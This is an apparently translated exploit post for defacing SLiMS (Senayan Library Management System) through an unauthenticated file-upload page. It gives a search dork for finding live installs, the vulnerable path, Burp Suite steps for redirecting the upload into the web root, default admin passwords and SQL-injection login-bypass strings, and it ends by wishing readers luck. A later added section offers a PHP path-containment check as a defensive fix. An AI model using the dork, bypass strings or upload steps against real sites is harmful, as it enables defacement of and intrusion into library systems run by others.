Slims CMS Senayan Library Management System File Upload

Deface with exploit: Slims CMS Senayan Library Management System File Upload
Reference link: cxsecurity.com/ascii/WLB-2018050260
Exploit: admin/modules/bibliography/pop_attach.php
Dork: intext:"This Software is Released Under GNU GPL License Version 3"
Proof of concept:
Open the exploit path, for example: http://localhost/admin/modules/bibliography/pop_attach.php
Open Burp Suite / Tamper Data.
Fill in the title with anything.
Upload your .txt file, containing: pwnd by bapakkau
Open Burp Suite. This is how to get the file uploaded to the home root (screenshot):

$file_upload->setUploadDir(REPO_BASE_DIR.DIRECTORY_SEPARATOR.str_replace('/', DIRECTORY_SEPARATOR, $file_dir));

Then click Forward. Done.

PoC 2:
- Log in with a default username/password:
  admin/admin
  admin/admin123
  admin' --/admin' --
  anything' OR 'x'='x/anything' OR 'x'='x
  ' or 1=1 limit 1 -- -+/' or 1=1 limit 1 -- -+
- Then upload the .txt file the same way as in the tutorial above.

Thank you. Good luck trying it.
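For defenders, the `setUploadDir()` line quoted above is where the upload destination is built. The following is an added example, not SLiMS code and not from the original post: a containment check that could run before that call, assuming `$file_dir` is taken from the request (as the tamper step implies). The helper name `resolveUploadDir()` and the demo directory names are hypothetical.

```php
<?php
// Added example, not SLiMS code. resolveUploadDir() is a hypothetical helper.

/**
 * Resolve a requested sub-directory to a real path inside $repoBase.
 * Returns null when the request would land outside the repository root.
 */
function resolveUploadDir(string $repoBase, string $requestedDir): ?string
{
    $base = realpath($repoBase);
    if ($base === false || !is_dir($base)) {
        return null; // repository root missing or misconfigured
    }
    if (strpos($requestedDir, "\0") !== false) {
        return null; // NUL byte in path
    }
    // Normalise separators, then allow only plain directory names.
    $target = $base;
    foreach (explode('/', str_replace('\\', '/', $requestedDir)) as $segment) {
        if ($segment === '' || $segment === '.') {
            continue;
        }
        if ($segment === '..' || !preg_match('/^[A-Za-z0-9_-]+$/', $segment)) {
            return null; // traversal or unexpected characters
        }
        $target .= DIRECTORY_SEPARATOR . $segment;
    }
    // Resolve symlinks and confirm the result is still under the root.
    $real = realpath($target);
    if ($real === false || !is_dir($real)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($real !== $base && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo: a temporary repository root with one sub-directory.
$repo = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'repo_demo_' . getmypid();
@mkdir($repo . DIRECTORY_SEPARATOR . 'attachments', 0700, true);
foreach (['attachments', '', '../', 'attachments/../..', '/etc'] as $dir) {
    $resolved = resolveUploadDir($repo, $dir);
    echo var_export($dir, true), ' => ', var_export($resolved, true), PHP_EOL;
}
```

When the helper returns null, the request should be rejected before any upload directory is set; the same page also needs an authenticated session and non-default credentials, since PoC 2 relies on default logins.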
